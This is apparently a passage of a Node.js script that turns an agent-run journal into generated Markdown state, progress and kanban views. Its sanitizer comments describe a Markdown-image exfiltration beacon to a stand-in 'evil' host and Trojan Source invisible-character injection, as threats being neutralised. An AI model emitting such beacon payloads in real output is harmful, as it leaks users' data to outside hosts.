#!/usr/bin/env node
/**
 * project — deterministic Markdown projections of a Tyran journal.
 *
 * The journal (`journal.jsonl`) is the only source of truth. `STATE.md` and
 * `PROGRESS.md` are disposable views of it: regenerate them at any time,
 * never edit them by hand. Design rules (see docs/projections.md):
 *  - deterministic: same journal bytes -> same output bytes, always;
 *  - idempotent: re-running on an unchanged journal rewrites identical files;
 *  - crash-tolerant: a truncated final line, corrupt lines, unknown event
 *    types and non-object events are reported, never fatal;
 *  - lossless: every event type in the closed set lands in a rendered
 *    section, and anything unrecognized is counted in plain sight.
 *
 * CLI:
 *   node project.mjs <journal.jsonl> [--out-dir <dir>] [--check]
 * Exit: 0 ok · 1 projections drifted (--check) · 2 usage/IO error
 */
import {
  existsSync,
  mkdirSync,
  readFileSync,
  realpathSync,
  renameSync,
  statSync,
  unlinkSync,
  writeFileSync,
} from 'node:fs';
import { dirname, join, resolve } from 'node:path';
import { fileURLToPath } from 'node:url';
import { readJournal, pairSpawns, spawnStaleness, isClosingPhase, DEFAULT_STALE_HOURS } from './journal.mjs';
import { escapeInvisible, jsonEscapeInvisible } from './invisible.mjs';

/** Projection file names. Both are fully generated — never hand-edited. */
export const STATE_FILE = 'STATE.md';
export const PROGRESS_FILE = 'PROGRESS.md';
export const BOARD_FILE = 'BOARD.md';
export const BOARD_JSON_FILE = 'board.json';

const GENERATED_HEADER =
  '<!-- GENERATED by tyran scripts/project.mjs - DO NOT EDIT. Source of truth: journal.jsonl -->\n' +
  '<!-- Regenerate: node scripts/project.mjs <journal.jsonl> --out-dir <dir> -->\n';

/**
 * Gate results that count as closed. Anything else keeps the gate OPEN.
 *
 * Exported because `overnight.skipReason` needs the same seven strings, and a
 * hand-copied literal there is a second spelling of one rule (ADR-21): adding
 * a pass result here while the watcher kept the old list would make it resume
 * a session whose gate this module already considers closed.
 */
export const GATE_PASS = new Set(['pass', 'passed', 'ok', 'green', 'approved', 'closed', 'answered']);

/**
 * Gate results that mean the gate SAID NO — as opposed to not having answered.
 *
 * Enumerated rather than derived as "anything that is not a pass", which was
 * the first shape of this and was wrong in a way the demo fixture caught at
 * once: it classified `open` — a gate that has not run yet — as a refusal, so
 * every pending gate carried a permanent objection it had never raised. A mark
 * that fires on everything says nothing, which is the same argument the board
 * makes for only ageing the lanes where standing still IS the defect.
 *
 * A refusal spelled some way this set has never seen is therefore missed
 * rather than invented. That is the safer direction: a missing mark leaves the
 * reader where they already were, while a false one sends them to re-open a
 * decision nobody ever objected to.
 */
export const GATE_REFUSAL = new Set([
  'deny', 'denied', 'fail', 'failed', 'red', 'refuse', 'refused',
  'reject', 'rejected', 'changes-requested', 'changes_requested', 'changes-needed', 'blocked',
]);

/** A gate result that means "a human owes an answer" — the board's queue. */
export const WAITING_RE = /^waiting[_-]?on[_-]?(operator|owner|human)$/i;
/** A gate kind that means "paused on the subscription window" (overnight mode). */
export const PAUSED_RE = /usage[-_]?limit/i;

/** Longest inline value rendered in a cell or list item, in codepoints. */
const MAX_CELL = 160;

/** Milestones rendered in PROGRESS.md; older ones are omitted VISIBLY. */
const MILESTONE_TYPES = new Set(['init.created', 'plan.accepted', 'gate', 'merge', 'checkpoint']);
const MAX_MILESTONES = 50;

// ------------------------------------------------------------- rendering

/**
 * The shared core of every operator-facing rendering: one line, nothing
 * invisible, bounded length.
 *
 * This is where the ONE invisibility policy is applied, for the document and
 * for the terminal alike. What is NOT shared is the medium's own escaping —
 * pipes, backticks and angle brackets are hazards in a Markdown table and
 * ordinary punctuation on stderr — and that is a different question from "is
 * this codepoint invisible", not a second answer to it. Keeping the two apart
 * is the same distinction this module already draws between the invisibility
 * rule and the disjoint whitespace rule (ADR-21).
 */
function oneLine(value) {
  let s;
  if (typeof value === 'string') s = value;
  else if (Array.isArray(value)) s = value.map((v) => (typeof v === 'string' ? v : JSON.stringify(v))).join(', ');
  else s = JSON.stringify(value) ?? String(value);
  // Every invisible codepoint becomes its visible escape notation. An
  // unterminated RLO would otherwise mirror every following column of a table
  // row — or every following character of a terminal line — so a journal value
  // could rewrite the document a human reads (Trojan Source); and a TAG
  // character would carry readable ASCII straight past a reader who cannot see
  // it at all. These documents are read by AGENTS, and their content travels
  // from subagent reports about FOREIGN repositories.
  //
  // Escaped, not deleted, and that is a decision with a reason: silent removal
  // made a poisoned value and a clean one render identically. See
  // escapeInvisible in scripts/invisible.mjs for the full argument.
  //
  // The membership list used to be a character class maintained BY HAND, right
  // here, and it was the weakest of the three spellings of the rule: it removed
  // 106 codepoints where the CI scanner removed 475, and it passed the entire
  // TAG block (U-46). One answer now, and no list here to fall behind it.
  //
  // Whitespace collapsing is a SEPARATE normalization: a tab and a newline are
  // VISIBLE characters that would break a row or a log line, so they are
  // folded, not banned.
  s = escapeInvisible(s)
    .replace(/\s+/g, ' ')
    .trim();
  const cps = Array.from(s);
  if (cps.length > MAX_CELL) s = cps.slice(0, MAX_CELL - 1).join('') + '…';
  return s;
}

/**
 * Make any journal value safe for one line of STDERR.
 *
 * Same invisibility policy as `inline()`, without the Markdown escaping that
 * would put `&lt;` in front of a human reading a terminal. A warning is an
 * operator-facing channel and gets exactly the same protection the documents
 * get — which it did not have until a security review put 37 invisible
 * codepoints, and a reconstructable "DELETE THE JOURNAL", on that terminal.
 */
export function inlinePlain(value) {
  if (value === undefined || value === null) return '(none)';
  const s = oneLine(value);
  return s === '' ? '(none)' : s;
}

/**
 * Make any journal value safe for one Markdown line: no newlines (they would
 * break a table row), no pipes/backticks (they would break the columns), no
 * `<`/`>` (they could close the GENERATED comment or inject HTML), no `[`/`]`
 * (Markdown link/image syntax reaching a remote host), no bidi overrides or
 * zero-width characters (Trojan Source), and a hard length cap so one huge
 * `data` field cannot produce a megabyte-wide table.
 */
export function inline(value) {
  if (value === undefined || value === null) return '&mdash;';
  const s = oneLine(value);
  if (s === '') return '&mdash;';
  return s
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/\\/g, '&#92;')
    .replace(/\|/g, '&#124;')
    .replace(/`/g, '&#96;')
    // `[` and `]` disarm Markdown link/image syntax: without this a journal
    // value could render as <img src="https://evil/?leak=..."> in GitHub or
    // VS Code — a read beacon plus an exfiltration channel for journal text.
    .replace(/\[/g, '&#91;')
    .replace(/\]/g, '&#93;');
}

/** Natural order (`T-2` before `T-10`), total and deterministic. */
export function naturalCompare(a, b) {
  const ax = String(a).match(/\d+|\D+/g) ?? [];
  const bx = String(b).match(/\d+|\D+/g) ?? [];
  for (let i = 0; i < Math.max(ax.length, bx.length); i++) {
    const x = ax[i];
    const y = bx[i];
    if (x === undefined) return -1;
    if (y === undefined) return 1;
    if (x === y) continue;
    const isNum = /^\d+$/.test(x) && /^\d+$/.test(y);
    if (isNum) {
      const d = Number(x) - Number(y);
      if (d !== 0) return d < 0 ? -1 : 1;
    } else return x < y ? -1 : 1;
  }
  return 0;
}

/** Stable sort by a natural key; ties keep their original (journal) order. */
/** Deduplicated and naturally ordered — a board.json array is compared byte
 * for byte, so "the order the journal happened to spawn them in" is not a
 * property this can rest on. */
function sortedUnique(values) {
  return [...new Set(values)].sort(naturalCompare);
}

function sortByKey(items, keyOf) {
  return items
    .map((item, i) => [item, i])
    .sort((a, b) => naturalCompare(keyOf(a[0]), keyOf(b[0])) || a[1] - b[1])
    .map(([item]) => item);
}

/**
 * The first of several near-synonymous descriptive keys that actually carries
 * text, or null when none does.
 *
 * `data` may always carry extra keys (journal.mjs), and agents improvise: the
 * same sentence arrives as `text` from one and `note` from another. Reading
 * one and ignoring the rest is how prose gets written and never read.
 *
 * `evidence` may be a LIST — docs/journal.md's `evidence[]` — so a list of
 * strings is joined rather than stringified into `[object Object]`. An empty
 * string and a whitespace-only string are not text; falling through to the
 * next candidate is better than rendering a blank cell that looks like a
 * missing feature.
 */
function firstText(...values) {
  for (const value of values) {
    if (typeof value === 'string' && value.trim() !== '') return value;
    if (Array.isArray(value)) {
      const parts = value.filter((v) => typeof v === 'string' && v.trim() !== '');
      if (parts.length > 0) return parts.join(' · ');
    }
  }
  return null;
}

/** A Markdown table, or an explicitly empty marker — never a hidden section. */
function table(headers, rows) {
  if (rows.length === 0) return '_none_\n';
  const head = `| ${headers.join(' | ')} |\n|${headers.map(() => '---').join('|')}|\n`;
  return head + rows.map((r) => `| ${r.join(' | ')} |\n`).join('');
}

function list(items) {
  if (items.length === 0) return '_none_\n';
  return items.map((s) => `- ${s}\n`).join('');
}

// ------------------------------------------------------------------ fold

/** The open blockage this agent reported clears when the agent moves on. */
function clearBlockageBy(state, agent) {
  state.blockages.delete(String(agent));
}

/** A `review`/`merge` settles the ticket for EVERY agent blocked on it. */
/**
 * Record that an agent SHOWED something, as opposed to said something.
 *
 * Newest wins, and only ever moves forward: events arrive in journal order, but
 * a hand-edited file need not be monotonic, and an older evidence event must
 * not make an agent look staler than the board already knows it is.
 */
function noteEvidence(state, agent, kind, ts) {
  if (agent == null) return;
  const key = String(agent);
  const prev = state.evidenceByAgent.get(key);
  if (prev !== undefined && String(prev.ts ?? '') > String(ts ?? '')) return;
  state.evidenceByAgent.set(key, { kind, ts });
}

function clearBlockagesOn(state, ticketId) {
  for (const [key, blockage] of state.blockages) {
    // A ticketless blockage is keyed to its agent and belongs to no ticket —
    // the `(no ticket)` pseudo-ticket of a review/merge without `data.ticket`
    // is a different thing and must not sweep it up.
    if (blockage.ticket != null && String(blockage.ticket) === ticketId) state.blockages.delete(key);
  }
}

/**
 * A `report` — and a `review`, which is the reviewer's completion event —
 * ENDS that agent's stint, so everything still keyed by its name goes with it.
 *
 * ADR-18 permits a later `spawn` to reuse the name once the prior one is
 * closed, and that is the standard close-spawn recovery path, not an exotic
 * journal. Kept, these records render against the NEXT incarnation: a fresh
 * agent that has emitted nothing showed as `blocked at <old ts>` while
 * `## Open blockages` said _none_ — one document contradicting itself. Cleared
 * here, at fold time, so no reader has to compare timestamps of its own.
 */
function closeAgent(state, agent) {
  clearBlockageBy(state, agent);
  state.progressByAgent.delete(String(agent));
}

/**
 * Fold a journal read into the projection state. Pure: no clock, no I/O.
 * Every closed-set event type must hit a branch here; anything else is
 * counted in `unknownTypes` so a newer Tyran's events stay visible to an
 * older projector instead of vanishing.
 */
export function fold({ events = [], truncatedTail = false, badLines = [] } = {}) {
  const state = {
    initiatives: [],
    total: 0,
    malformed: 0,
    byType: new Map(),
    unknownTypes: new Map(),
    truncatedTail,
    corruptLines: badLines.length,
    firstTs: null,
    lastTs: null,
    lastEvent: null,
    checkpoint: null,
    planAccepted: null,
    created: null,
    tickets: new Map(),
    agents: [],
    gates: new Map(),
    leases: new Map(),
    mismatchedReleases: [],
    decisions: [],
    retro: [],
    errors: [],
    milestones: [],
    unusableAgentNames: [],
    ambiguousAgents: [],
    // agent name -> latest self-reported signal (last one wins)
    progressByAgent: new Map(),
    // What an agent has SHOWN, as opposed to what it has said. A `progress`
    // event is a heartbeat an agent emits at will; the events here each carry
    // a work product — a report with its evidence[], a finding with its proof,
    // a review or a merge on the agent's ticket. An agent looping without
    // achieving anything can keep `progressByAgent` perfectly fresh, and used
    // to sort to the BOTTOM of a strip ordered by staleness.
    evidenceByAgent: new Map(),
    // agent name -> that agent's open blockage, the ticket inside the value.
    //
    // Keyed by AGENT and not by ticket, because one agent has at most one live
    // blockage (last-blocked-wins, exactly like its last signal) while one
    // ticket can block SEVERAL agents. Under ticket keys the second agent's
    // record replaced the first's, and the second agent's next movement signal
    // then deleted a blockage its owner had never cleared — so an agent stayed
    // stuck with nothing anywhere saying so. The ticket survives as rendered
    // context and as what `review`/`merge` match against.
    //
    // Cleared by `unblocked`/`started`/`working` from the SAME agent, by that
    // agent's report/review, and by a `review`/`merge` on the ticket — AT FOLD
    // TIME, so no reader needs temporal reasoning of its own.
    blockages: new Map(),
    findings: [],
    // `ticket.status` events naming a ticket no other event mentions
    unknownOverrides: [],
    unknownErrorTickets: [],
    // Spawns a closing checkpoint closed without a report of their own.
    // Counted and named rather than silently flipped (ADR-19 correction 1):
    // an agent that never reported is a hole in the record, and a close is
    // the moment to say so, not to tidy it away.
    closedBySpawn: [],
  };

  /**
   * Who is still working is answered ONCE, by journal.pairSpawns, and rendered
   * here (ADR-21). This function used to compute its own answer with its own
   * rule — "prefer the running spawn of that agent working on THAT ticket,
   * else the oldest open spawn of the same name" — while pairSpawns paired
   * strictly FIFO by name and excluded unusable names outright. The two
   * disagreed on both axes, and the operator got both answers at once: for a
   * spawn whose agent name carried a zero-width joiner, STATE.md said
   * **running (no report yet)** while doctor, reading pairSpawns, saw no open
   * spawn at all. Two artefacts that doctor itself produces, contradicting
   * each other about the one question the state layer exists to answer.
   *
   * The ticket-first rule is GONE, not parameterized. Its only stated
   * justification was journals written before ADR-18, which can hold two open
   * spawns of one name — and that population was measured before this change:
   * zero. Not one such journal exists in this repository, in its entire git
   * history, or anywhere on the machine that develops it; the only .jsonl ever
   * committed is the demo fixture, which has one spawn per name. Journals are
   * append-only, so a rule kept "for old files" cannot ever be retired later —
   * it is a permanent second semantics, not a migration window. ADR-18 already
   * makes `append` REFUSE the state ticket-first existed to disambiguate, so
   * the rule was resolving an ambiguity the system had declared illegal, and
   * resolving it differently from every other consumer.
   *
   * When that state does appear (a hand-edited file), it is now REPORTED
   * rather than silently guessed at — see `warnings()` — which is what ADR-18
   * asks for: make the ambiguity visible, do not have each reader guess.
   */
  const paired = pairSpawns(events);
  const reportForSpawn = new Map(paired.pairs.map((p) => [p.spawn, p.report]));
  const orphanReports = new Set(paired.orphanReports);
  const unusableEvents = new Map(paired.unusable.map((u) => [u.event, u.problem]));
  for (const [raw, problem] of paired.badNames) state.unusableAgentNames.push({ raw, problem });
  for (const [agent, count] of paired.ambiguous) state.ambiguousAgents.push({ agent, count });

  const ticketOf = (id, seenTs) => {
    const key = String(id);
    if (!state.tickets.has(key)) {
      state.tickets.set(key, {
        id: key,
        declared: false,
        title: null,
        deps: null,
        agents: [],
        // The same spawns as `agents`, by REFERENCE rather than by name, so a
        // ticket can answer "what actually ran here" — which model, from when
        // to when, ending in what verdict. `agents` stays a list of names
        // because BOARD.md and the lane cards both read it as one.
        //
        // References, not copies, on purpose: the `report` fold mutates a
        // spawn's status, verdict and reportTs after this push, and a copy
        // taken at spawn time would freeze every run as `running` with no
        // verdict — which is exactly the row an operator opens a finished
        // ticket to read.
        runs: [],
        report: null,
        review: null,
        merge: null,
        override: null,
        error: null,
        lastTs: seenTs ?? null,
      });
    }
    const t = state.tickets.get(key);
    if (seenTs) t.lastTs = seenTs;
    return t;
  };

  for (const event of events) {
    if (typeof event !== 'object' || event === null || Array.isArray(event)) {
      state.malformed++;
      continue;
    }
    state.total++;
    const ev = typeof event.ev === 'string' ? event.ev : '(missing ev)';
    const ts = typeof event.ts === 'string' ? event.ts : null;
    const actor = typeof event.actor === 'string' ? event.actor : null;
    const data = typeof event.data === 'object' && event.data !== null && !Array.isArray(event.data) ? event.data : {};
    state.byType.set(ev, (state.byType.get(ev) ?? 0) + 1);
    if (typeof event.init === 'string' && event.init !== '' && !state.initiatives.includes(event.init)) {
      state.initiatives.push(event.init);
    }
    if (ts) {
      if (state.firstTs === null) state.firstTs = ts;
      state.lastTs = ts;
    }
    state.lastEvent = { ev, ts, actor };
    if (MILESTONE_TYPES.has(ev)) state.milestones.push({ ev, ts, actor, data });

    switch (ev) {
      case 'init.created':
        state.created = { ts, actor, data };
        break;
      case 'plan.accepted':
        state.planAccepted = { ts, actor, data };
        break;
      case 'ticket.created': {
        const t = ticketOf(data.id ?? '(no id)', ts);
        t.declared = true;
        t.title = data.title ?? data.text ?? null;
        t.deps = Array.isArray(data.deps) ? data.deps : null;
        break;
      }
      case 'spawn': {
        const agent = {
          agent: data.agent ?? '(no agent)',
          role: data.role ?? null,
          model: data.model ?? null,
          ticket: data.ticket ?? null,
          worktree: data.worktree ?? null,
          spawnTs: ts,
          status: 'running',
          verdict: null,
          reportTs: null,
          // Set only by a closing checkpoint — see the `checkpoint` fold.
          closedTs: null,
        };
        // An unusable name is NOT a correlator, so pairSpawns excludes it — and
        // this row must say so. The two answers that were available were
        // "invisible" and "running", and the operator was getting both. It is
        // neither: a silent exclusion is the failure ADR-19 correction 1
        // forbids outright ("a skipped item must be counted and named, even on
        // a clean run"), and rendering it as an ordinary running agent is the
        // false picture of state that ADR-18 calls worse than no picture. So:
        // visible, and visibly unusable, in both artefacts.
        if (unusableEvents.has(event)) {
          agent.status = 'unusable agent name (excluded from pairing)';
        } else {
          const report = reportForSpawn.get(event);
          if (report) {
            agent.status = 'reported';
            agent.verdict = report.data?.verdict ?? null;
            agent.reportTs = typeof report.ts === 'string' ? report.ts : null;
            if (agent.ticket == null && report.data?.ticket != null) agent.ticket = report.data.ticket;
          }
        }
        state.agents.push(agent);
        if (data.ticket != null) {
          const onTicket = ticketOf(data.ticket, ts);
          onTicket.agents.push(agent.agent);
          onTicket.runs.push(agent);
        }
        break;
      }
      case 'report': {
        noteEvidence(state, data.agent ?? actor, 'report', ts);
        // A report that pairSpawns matched to a spawn has already been applied
        // to that spawn's row above — this branch only has to render what
        // pairing left over, so the two never compute the same thing twice.
        if (orphanReports.has(event) || unusableEvents.has(event)) {
          state.agents.push({
            agent: data.agent ?? '(no agent)',
            role: null,
            model: null,
            ticket: data.ticket ?? null,
            worktree: null,
            spawnTs: null,
            status: unusableEvents.has(event)
              ? 'unusable agent name (excluded from pairing)'
              : 'reported (no spawn event)',
            verdict: data.verdict ?? null,
            reportTs: ts,
          });
        }
        if (data.ticket != null) {
          const t = ticketOf(data.ticket, ts);
          t.report = {
            verdict: data.verdict ?? null,
            ts,
            by: data.agent ?? actor,
            // WHAT the agent said, not just whether it passed.
            //
            // Agents write prose on a report — `text`, `note`, `evidence` —
            // and this fold read none of it, so a verdict of `changes-needed`
            // arrived on the board with the reason it was written next to it
            // silently discarded. `decision` already folds `data.text` and
            // `gate` already folds `evidence_ref ?? evidence`; a report was
            // the one carrier of description that wrote to nowhere.
            //
            // One field, coalesced in the order agents actually use, because
            // three near-synonyms rendered as three separate rows is how the
            // same answer ends up in three places (ADR-21).
            text: firstText(data.text, data.note, data.evidence),
          };
          t.override = null; // a lifecycle event outranks a hand-set lane
          t.error = null;
        }
        if (data.agent != null) closeAgent(state, data.agent);
        break;
      }
      case 'progress': {
        const agent = String(data.agent ?? '(no agent)');
        state.progressByAgent.set(agent, {
          state: data.state ?? null,
          ticket: data.ticket ?? null,
          detail: data.detail ?? null,
          next: data.next ?? null,
          ts,
        });
        if (data.state === 'blocked') {
          state.blockages.set(agent, { ticket: data.ticket ?? null, agent, detail: data.detail ?? null, ts });
        } else {
          // started / working / unblocked all say "this agent is moving";
          // whatever it reported itself blocked on is no longer blocking.
          clearBlockageBy(state, agent);
        }
        break;
      }
      case 'finding':
        noteEvidence(state, actor, 'finding', ts);
        state.findings.push({
          id: data.id ?? null,
          area: data.area ?? null,
          claim: data.claim ?? null,
          proof: data.proof ?? null,
          ticket: data.ticket ?? null,
          confidence: data.confidence ?? null,
          ts,
          actor,
        });
        break;
      case 'ticket.status': {
        // An override is a LANE, not progress: it must never move the percent.
        // Minting a ledger ticket for an id no other event mentions did exactly
        // that — one mistyped id (`T-1O` for `T-10`) enlarged the denominator
        // and dropped the headline percent, while the ticket the operator meant
        // to park stayed unparked. So the override lands only on a ticket the
        // journal already knows; an unknown one is refused OUT LOUD (see
        // `warnings()`) rather than inventing the ticket it names, because a
        // silent exclusion is the failure ADR-19 correction 1 forbids.
        const key = String(data.ticket ?? '(no ticket)');
        if (!state.tickets.has(key)) {
          state.unknownOverrides.push({ ticket: key, ts });
          break;
        }
        const t = ticketOf(key, ts);
        t.override = { column: data.column ?? null, reason: data.reason ?? null, until: data.until ?? null, ts };
        break;
      }
      case 'gate': {
        const kind = String(data.kind ?? '(no kind)');
        const prev = state.gates.get(kind);
        const result = data.result ?? null;
        // A refusal is a gate that SAID NO, not one that has yet to answer —
        // see GATE_REFUSAL for why this is a named set rather than "not a pass".
        const refused = GATE_REFUSAL.has(String(result ?? '').trim().toLowerCase());
        state.gates.set(kind, {
          kind,
          result,
          ts,
          evidence: data.evidence_ref ?? data.evidence ?? null,
          // extra data keys are legal on append; the ask fields ride along so
          // the board's waiting-operator queue can render the question with
          // its recommendation and default (absent on ordinary gates).
          ticket: data.ticket ?? null,
          question: data.question ?? null,
          recommendation: data.recommendation ?? null,
          default: data.default ?? null,
          count: (prev?.count ?? 0) + 1,
          // Gate results are keyed by `kind`, so the latest one wins the slot —
          // and a re-run that passes therefore ERASED the refusal that came
          // before it. That is precisely the signal a gate exists to raise:
          // "the security gate denied this, then someone re-ran it green" and
          // "the security gate has only ever passed" rendered identically, and
          // the second reading is the one an operator took away.
          //
          // `count` already survived, so the VOLUME was never lost — only the
          // verdict. So this is additive and narrow: the last refusal is kept
          // beside the current result, never instead of it, and the counter is
          // left exactly as it was.
          lastRefusal: refused
            ? { result, ts, evidence: data.evidence_ref ?? data.evidence ?? null, ticket: data.ticket ?? null }
            : prev?.lastRefusal ?? null,
        });
        break;
      }
      // `review`/`merge` require data.ticket, but a hand-written or older
      // journal may omit it — bucket those under a visible pseudo-ticket
      // instead of dropping the event (silent loss is the worse failure).
      case 'review': {
        const t = ticketOf(data.ticket ?? '(no ticket)', ts);
        t.review = { verdict: data.verdict ?? null, by: data.by ?? actor, ts };
        t.override = null;
        t.error = null;
        clearBlockagesOn(state, t.id);
        // The review is the REVIEWER's completion event, as a report is the
        // implementer's: pairSpawns closes the reviewer's spawn on `data.by`,
        // and the same correlator closes what that spawn left behind. Without
        // it a reviewer's ticketless blockage outlived its own review with no
        // later event that could ever clear it.
        noteEvidence(state, data.by ?? actor, 'review', ts);
        if (data.by != null) closeAgent(state, data.by);
        break;
      }
      case 'merge': {
        const t = ticketOf(data.ticket ?? '(no ticket)', ts);
        t.merge = { sha: data.sha ?? null, mode: data.mode ?? null, ts };
        t.override = null;
        t.error = null;
        clearBlockagesOn(state, t.id);
        break;
      }
      case 'decision':
        state.decisions.push({ id: data.id ?? '(no id)', text: data.text ?? null, ts, actor });
        break;
      case 'lease.acquired': {
        const key = String(data.resource ?? '(no resource)');
        state.leases.set(key, { resource: key, holder: data.holder ?? null, ts });
        break;
      }
      case 'lease.released': {
        const key = String(data.resource ?? '(no resource)');
        const held = state.leases.get(key);
        // Mirrors journal.tail(): only the current holder can free a lease.
        if (held && held.holder === data.holder) state.leases.delete(key);
        else state.mismatchedReleases.push({ resource: key, by: data.holder ?? null, holder: held?.holder ?? null, ts });
        break;
      }
      case 'checkpoint': {
        state.checkpoint = { phase: data.phase ?? null, nextSteps: data.next_steps, ts, actor };
        // A closing checkpoint closes the initiative's still-open spawns.
        //
        // This fold used to record the checkpoint and nothing else, so an
        // initiative could be explicitly wound up while three agents that
        // never reported stayed `running` in every artefact forever. No other
        // event closes an initiative, which is why the meaning has to hang on
        // this one reserved phase value.
        //
        // Only spawns folded BEFORE this point: the pass runs in event order,
        // so an agent spawned after the checkpoint is a new incarnation and
        // keeps its own lifecycle. And only `running` ones — a spawn already
        // paired with a report, or excluded for an unusable name, has an
        // answer of its own that this must not overwrite.
        if (isClosingPhase(data.phase)) {
          for (const a of state.agents) {
            if (a.status !== 'running') continue;
            a.status = 'closed with the initiative (no report)';
            // Not a report: the agent never filed one, and pretending it did
            // would put a verdict on the row that nobody earned. The time is
            // when the initiative ended, which is what "since" means here.
            a.closedTs = ts;
            state.closedBySpawn.push({ agent: a.agent, ticket: a.ticket ?? null, spawnTs: a.spawnTs, ts });
          }
        }
        break;
      }
      case 'retro.entry':
        state.retro.push({ kind: data.kind ?? null, target: data.target ?? null, confidence: data.confidence ?? null, ts });
        break;
      case 'error': {
        // The ticket travels ON the error, not only in the separate
        // unknown-ticket list. A consumer that wanted both — the board does —
        // otherwise had to join the two by timestamp, and emitted one event as
        // two rows when it could not.
        const errTicket = data.ticket != null ? String(data.ticket) : null;
        const errKnown = errTicket !== null && state.tickets.has(errTicket);
        state.errors.push({
          class: data.class ?? null,
          detail: data.detail ?? null,
          ts,
          actor,
          ticket: errTicket,
          ticket_unknown: errTicket !== null && !errKnown,
        });
        // `data.ticket` is optional metadata on an error, so a typo here is a
        // typo nothing rejected at append. Binding it to a ticket the journal
        // has never seen would MINT that ticket, and a minted ticket is one
        // the denominator counts and no `merge` can ever close — the headline
        // percent falls and never recovers. Same rule as `ticket.status`
        // above, for the same reason; the error itself is still rendered in
        // the Errors table either way, so nothing is lost by not binding it.
        if (data.ticket != null) {
          const key = String(data.ticket);
          if (state.tickets.has(key)) {
            ticketOf(key, ts).error = { class: data.class ?? null, detail: data.detail ?? null, ts };
          } else {
            state.unknownErrorTickets.push({ ticket: key, ts });
          }
        }
        break;
      }
      default:
        state.unknownTypes.set(ev, (state.unknownTypes.get(ev) ?? 0) + 1);
    }
  }

  const tickets = sortByKey([...state.tickets.values()], (t) => t.id);
  const merged = tickets.filter((t) => t.merge !== null).length;
  state.ticketList = tickets;
  state.merged = merged;
  state.percent = tickets.length === 0 ? 0 : Math.round((merged / tickets.length) * 100);
  state.openGates = [...state.gates.values()].filter(
    (g) => !GATE_PASS.has(String(g.result ?? '').toLowerCase()),
  );
  return state;
}

/** Human-readable status of one ticket, derived from the strongest signal. */
export function ticketStatus(t) {
  // A hand-set lane outranks derivation — but only until the next stronger
  // lifecycle event, which clears it AT FOLD TIME. It never touches the
  // merged count or the percent: an override is a lane, not progress.
  if (t.override) return `${t.override.column ?? '(no column)'} (set by ticket.status)`;
  if (t.merge) return `merged (${t.merge.sha ?? 'no sha'})`;
  if (t.review) return `review: ${t.review.verdict ?? 'no verdict'}`;
  if (t.report) return `reported: ${t.report.verdict ?? 'no verdict'}`;
  if (t.agents.length > 0) return 'in progress';
  return 'open';
}

// ------------------------------------------------------------------ board

/** Lane order, strongest verdicts first. The board renders one section per
 * lane; a ticket lands in exactly ONE, by the precedence in `boardOf`. */
export const LANES = Object.freeze([
  'waiting-operator',
  'paused-limit',
  'blocked',
  'changes-requested',
  'in-review',
  'in-progress',
  'ready',
  'backlog',
  'parked',
  'done',
]);

/**
 * A review verdict that counts as an approval.
 *
 * Exported because `tiers.mjs` counts FAILED attempts on a ticket to decide
 * whether to escalate, and "did this attempt fail" must not have two answers
 * (ADR-21). Note the asymmetry this creates, stated because someone will meet
 * it: the pattern was written for lane assignment, so "approved with nits"
 * reads as an approval and "looks fine" does not.
 */
export const APPROVING_RE = /^approv|^lgtm$|^pass/i;

/**
 * The kanban view of a folded state. PURE and clock-free: every timestamp is
 * copied from an event; "how old" is a question only the HTML viewer answers,
 * client-side. A ticket is in exactly one lane, decided strongest-first:
 *
 *   done (merge) > parked/waiting-operator/blocked (override) > blocked
 *   (open blockage or error) > paused-limit (an open usage-limit gate AND the
 *   ticket would otherwise be in progress) > changes-requested > in-review >
 *   in-progress > ready (all deps merged; an UNKNOWN dep counts unmet — a
 *   typo must refuse to schedule, not schedule) > backlog.
 */
export function boardOf(state, { staleHours = DEFAULT_STALE_HOURS } = {}) {
  const lanes = new Map(LANES.map((lane) => [lane, []]));
  const runningByTicket = new Map();
  for (const a of state.agents) {
    if (a.status === 'running' && a.ticket != null) {
      runningByTicket.set(String(a.ticket), [...(runningByTicket.get(String(a.ticket)) ?? []), a.agent]);
    }
  }
  const mergedIds = new Set(state.ticketList.filter((t) => t.merge !== null).map((t) => t.id));
  const knownIds = new Set(state.ticketList.map((t) => t.id));
  const pausedGate = [...state.gates.values()].find(
    (g) => PAUSED_RE.test(g.kind) && !GATE_PASS.has(String(g.result ?? '').toLowerCase()),
  ) ?? null;

  // What each open question is HOLDING UP.
  //
  // `deps` is resolved forward everywhere else — a ticket is ready when its
  // dependencies are merged — and the reverse direction was never computed, so
  // a queue of nine questions sorted by age alone put the one gating six
  // tickets wherever it happened to fall. The walk is transitive and skips
  // merged tickets, which are not held up by anything.
  //
  // Only when the initiative declares deps at all: on a journal that records
  // none, every ask would report "blocks 0", and an absence rendered as a
  // measurement is worse than saying nothing.
  const declaresDeps = state.ticketList.some((x) => Array.isArray(x.deps) && x.deps.length > 0);
  const dependents = new Map();
  if (declaresDeps) {
    for (const x of state.ticketList) {
      for (const d of Array.isArray(x.deps) ? x.deps.map(String) : []) {
        dependents.set(d, [...(dependents.get(d) ?? []), x.id]);
      }
    }
  }
  const blockedBy = (ticket) => {
    if (!declaresDeps || ticket == null) return null;
    const seen = new Set();
    const queue = [String(ticket)];
    while (queue.length > 0) {
      for (const next of dependents.get(queue.shift()) ?? []) {
        if (seen.has(next) || mergedIds.has(next)) continue;
        seen.add(next);
        queue.push(next);
      }
    }
    return { count: seen.size, ids: [...seen].sort(naturalCompare) };
  };

  const asks = [];
  for (const g of state.openGates) {
    if (WAITING_RE.test(String(g.result ?? ''))) {
      asks.push({
        blocks: blockedBy(g.ticket),
        kind: g.kind,
        ticket: g.ticket ?? null,
        question: g.question ?? null,
        recommendation: g.recommendation ?? null,
        default: g.default ?? null,
        since: g.ts ?? null,
      });
    }
  }
  const askTickets = new Set(asks.filter((a) => a.ticket != null).map((a) => String(a.ticket)));
  // Blockages are keyed by AGENT (one ticket can block several agents), so a
  // ticket's blockage is found by scanning for its id, never by lookup.
  const blockageOn = (ticketId) => {
    for (const b of state.blockages.values()) if (b.ticket != null && String(b.ticket) === ticketId) return b;
    return null;
  };

  for (const t of state.ticketList) {
    const laneOf = () => {
      if (t.merge) return 'done';
      if (t.override?.column && LANES.includes(t.override.column)) return t.override.column;
      if (askTickets.has(t.id)) return 'waiting-operator';
      if (blockageOn(t.id) !== null || t.error !== null) return 'blocked';
      const running = runningByTicket.get(t.id) ?? [];
      if (pausedGate !== null && running.length > 0) return 'paused-limit';
